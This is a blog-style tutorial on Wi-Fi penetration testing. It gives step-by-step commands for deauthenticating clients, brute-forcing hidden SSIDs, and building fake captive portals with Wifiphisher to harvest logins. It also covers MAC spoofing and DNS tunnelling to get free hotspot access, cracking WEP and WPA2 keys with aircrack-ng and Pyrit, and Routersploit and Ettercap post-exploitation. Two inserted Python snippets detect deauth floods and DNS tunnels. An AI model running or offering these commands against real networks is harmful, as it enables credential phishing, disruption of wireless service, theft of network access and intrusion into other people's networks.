WiFi penetration testing basics

Wi-Fi is a wireless networking technology that allows devices such as computers (laptops and desktops), mobile devices (smartphones and wearables), and other equipment (printers and video cameras) to interface with the Internet. It allows these devices, and many more, to exchange information with one another, creating a network.

As soon as technologies moved to wireless implementations, they opened a new, wide attack surface and brand new ways to compromise a private network or even an intranet. Techniques such as cracking weak encryption, MAC/IP spoofing, DNS poisoning, piggybacking, wardriving, rogue access points, fake captive portals, MitM and many more have been the most popular attack threats against networks over the last decade.

Today I will list a few simple and common attack vectors that exist in wireless networks. For more information, please follow our previous review of the most common attack vectors.

First, let's list the basic commands and tools. I am using a Kali Purple edition virtual machine, where all of the tools I will use in this review are available out of the box. To interact with Wi-Fi networks I will need a wireless adapter. I use a cheap $14 TP-Link Archer T3U adapter based on the RTL88x2BU chipset.

You will need a Wi-Fi adapter that supports monitor mode.

WiFi penetration testing: basic attack techniques

Before we start!

This article contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only.

Check interface mode and status:

$ iwconfig $INTERFACE_NAME
$ ifconfig $INTERFACE_NAME

Put the adapter into monitor mode (airmon-ng, from the aircrack-ng suite, first stops the processes that would interfere):

$ airmon-ng check kill
$ ifconfig $INTERFACE_NAME down
$ iwconfig $INTERFACE_NAME mode monitor
$ ifconfig $INTERFACE_NAME up

List networks:

$ airodump-ng $INTERFACE_NAME -c $CHANNEL -e $ESSID

Deauthentication:

# Only one client
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME

# All the clients in the AP
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $INTERFACE_NAME

Getting a hidden SSID when clients are connected. List the networks using airodump-ng and note the AP's MAC address ($AP_MAC) and the MAC of one client ($CLIENT_MAC). Then, in another terminal, deauthenticate one client or all of them. When airodump-ng captures a handshake from this network, the name (ESSID) will appear in the first terminal:

$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME
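Deauthentication frames like the ones aireplay-ng sends above are not authenticated unless the network uses 802.11w (Protected Management Frames), so for a defender the most reliable signal is their volume. The following Python is an added example, not code from the original post: it parses constructed raw 802.11 frames (no radiotap header) and flags every (source, destination) pair that exceeds a per-second deauthentication threshold. The frame bytes, MAC addresses, timestamps and threshold are all assumptions made for the demonstration.

```python
import struct
from collections import Counter

# Constructed raw 802.11 frames (no radiotap header), laid out as:
# frame control | duration | addr1 (dst) | addr2 (src) | addr3 (bssid) | seq ctl | reason
# "c000" = type 0 (management), subtype 12 (deauthentication); "0800" = a data frame.
FLOOD_FRAME = bytes.fromhex("c000" "0000" "ffffffffffff" "00112233aabb" "00112233aabb" "0000" "0700")
LEGIT_FRAME = bytes.fromhex("c000" "0000" "66778899ccdd" "00112233aabb" "00112233aabb" "0000" "0300")
DATA_FRAME = bytes.fromhex("0800" "0000" "66778899ccdd" "00112233aabb" "00112233aabb" "0000")
DEAUTH_SUBTYPE = 12  # management-frame subtype for deauthentication

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt_frame(frame):
    """Return a dict for a management frame, None for data/control or truncated frames."""
    if len(frame) < 24:
        return None
    frame_control = struct.unpack_from("<H", frame, 0)[0]   # little-endian 16-bit field
    if ((frame_control >> 2) & 0x3) != 0:                   # type 0 = management
        return None
    info = {"subtype": (frame_control >> 4) & 0xF,
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}
    if info["subtype"] == DEAUTH_SUBTYPE and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # reason code follows the header
    return info

def detect_deauth_flood(timed_frames, per_second_threshold):
    """timed_frames: iterable of (timestamp_seconds, raw_frame).
    Returns {(src, dst, second): count} for one-second buckets at or above the threshold."""
    buckets = Counter()
    for ts, frame in timed_frames:
        info = parse_mgmt_frame(frame)
        if info and info["subtype"] == DEAUTH_SUBTYPE:
            buckets[(info["src"], info["dst"], int(ts))] += 1
    return {key: n for key, n in buckets.items() if n >= per_second_threshold}

def sample_capture():
    """Constructed capture: one ordinary deauth and one data frame, then a burst of
    64 broadcast deauths claiming to come from the AP inside a single second."""
    frames = [(100.0, LEGIT_FRAME), (100.5, DATA_FRAME)]
    frames += [(101.0 + i / 100, FLOOD_FRAME) for i in range(64)]
    return frames
```

On a real capture the same logic runs over frames read from a monitor-mode interface or a pcap; the fix on the network side is enabling 802.11w so that forged deauthentication frames are discarded.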

Getting a hidden SSID without clients. List the networks using airodump-ng and note the AP's MAC address ($AP_MAC) and the MAC of one client ($CLIENT_MAC). Then use mdk3 to brute force the name. Do not stop the capture:

# Execute a dictionary attack
$ mdk3 $INTERFACE_NAME p -t $AP_MAC -f $DICTIONARY_PATH

# Brute-force attack
$ mdk3 $INTERFACE_NAME p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET

Open networks

Public Wi-Fi networks, or hotspots, in coffee shops, malls, airports, hotels and other places are convenient. Most of the time they do not use an enhanced security configuration, or are not secured at all.

Fake captive portals
  1. Clone any website using a tool like HTTrack.
  2. Install Wifiphisher. Put the HTTrack output in a new folder at wifiphisher/data/phishingpages/new_page/html and a configuration file at wifiphisher/data/phishingpages/new_page/config.ini.
  3. Reinstall the project using python setup.py install or the binary in bin.
  4. Running it may require installing hostapd.
  5. Now you are ready to deauthenticate any client and wait for someone to log in and leave their credentials.

Bypassing open network authentication with MAC spoofing

The method to bypass a captive portal is to change your MAC address to that of an already authenticated user. First, scan the network to get the list of IP and MAC addresses. You can use nmap host discovery only:

$ nmap 192.168.1.1/24 -sn

Change your IP and MAC addresses using macchanger:

$ macchanger

Bypassing open network authentication with DNS tunneling

The second method is to create a DNS tunnel. For this you need an accessible DNS server of your own. This method can be used to bypass the captive portal and get "free" Wi-Fi in hotels and airports.

Check that domain names are resolved:

$ nslookup example.com

Create two DNS records using any free registrar, such as GoDaddy or BlueHost:

One "A record": dns.$DOMAIN pointing to $SERVER_IP (example: dns.domain.com -> 139.59.172.117)
One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (example: hack.domain.com -> dns.domain.com)

Use iodine:

# On server
$ iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN

# On client
$ iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN

Create the tunnel:

$ ssh -D 8080 $USER@10.0.0.1
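The tunnel above works because captive portals usually forward DNS before a client has authenticated, so all data has to travel inside query names under the delegated zone (hack.$DOMAIN), and that is exactly what gives it away in resolver logs. The following Python is an added example, not part of the original post: it scores constructed DNS log lines by the length and Shannon entropy of the labels below a delegated zone and flags clients whose query stream looks like encoded data rather than host names. The log format, zone name, client addresses and thresholds are assumptions for the demonstration.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log, assumed format: "<time> <client_ip> <qtype> <qname>".
SAMPLE_LOG = """\
10:00:01 192.168.1.23 NULL paqiy6r2xj3m0l9wkh7sd4c5e8t1vbgq.hack.domain.com
10:00:01 192.168.1.23 NULL 0zq9w2rmk8f5yl3hv7dc6bx1jnt4pge.hack.domain.com
10:00:02 192.168.1.23 NULL 7hqyk3mwz0tcl2nv9bx5fd8g1jp6rs4e.hack.domain.com
10:00:02 192.168.1.23 NULL vb6dc9x1p7ml0qh4jk2ew8ns5yz3tf.hack.domain.com
10:00:03 192.168.1.23 NULL l4wx8cz2mq7vb0hk6ns3tp1yg9djfre5.hack.domain.com
10:00:05 192.168.1.40 A www.domain.com
10:00:07 192.168.1.40 A dns.hack.domain.com
"""

def shannon_entropy(text):
    """Bits of entropy per character (0.0 for an empty string)."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0

def query_features(qname, zone):
    """Return (payload_length, entropy) of the labels below `zone`, or None if outside it."""
    suffix = "." + zone
    if not qname.endswith(suffix):
        return None
    payload = qname[:-len(suffix)].replace(".", "")   # labels carrying tunnelled data
    return len(payload), shannon_entropy(payload)

def detect_dns_tunnel(log_text, zone, min_queries=5, min_len=20, min_entropy=3.5):
    """Flag clients that send many long, high-entropy queries under `zone`.
    Returns {client_ip: mean_entropy} for the clients that cross every threshold."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        feats = query_features(parts[3].lower(), zone)
        if feats:
            per_client[parts[1]].append(feats)
    flagged = {}
    for client, feats in per_client.items():
        if len(feats) < min_queries:
            continue
        mean_len = sum(length for length, _ in feats) / len(feats)
        mean_ent = sum(ent for _, ent in feats) / len(feats)
        if mean_len >= min_len and mean_ent >= min_entropy:
            flagged[client] = round(mean_ent, 2)
    return flagged
```

Thresholds need tuning per environment, since CDN and anti-spam lookups also produce long labels; query volume per client and the use of unusual record types such as NULL or TXT are the complementary signals.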

WEP and WPA cracking

WEP IV pass cracking

Wired Equivalent Privacy (WEP) is one of the weakest wireless standards still in use. The easiest way to crack it is with the aircrack-ng suite, starting from an airodump-ng capture.

Start capture:

$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME

Accelerate the IV capture using fake authentication, ARP request replay and client deauthentication. Stop airodump-ng at roughly 100,000 distinct IVs:

$ aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -3 -b $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME

Use aircrack-ng to recover the key:

$ aircrack-ng $PCAP_FILE

WPA2-PSK cracking

Start capture:

$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME

Deauthenticate a user. Stop the airodump-ng capture when you see the message 'WPA handshake: $MAC':

$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME

Crack the handshake using aircrack-ng:

$ aircrack-ng -w $WORDLIST $PCAP_FILE-01.cap

Or using Pyrit:

$ pyrit -r $PCAP_FILE analyze
$ pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
$ pyrit -i $WORDLIST import_passwords
$ pyrit eval
$ pyrit batch
$ pyrit -r $CLEAN_PCAP_FILE attack_db

Post exploitation technique

Once you are connected to the network, you can examine the router and the rest of the network with these tools:

  1. Routersploit: an exploitation framework for embedded devices. Try "use scanners/autopwn".
  2. Nmap/Zenmap: security scanner, port scanner and network exploration tool.
  3. Masscan: a faster alternative to nmap (it can break things, so be careful).
  4. Netdiscover: ARP sniffing. Very useful if the network is very well segmented.
  5. Ettercap: check whether you can perform a MitM attack and sniff all the traffic on the network.

Hope you like it!

Please follow me on Twitter and subscribe to our newsletter to be in touch.

Save your privacy, be ethical!
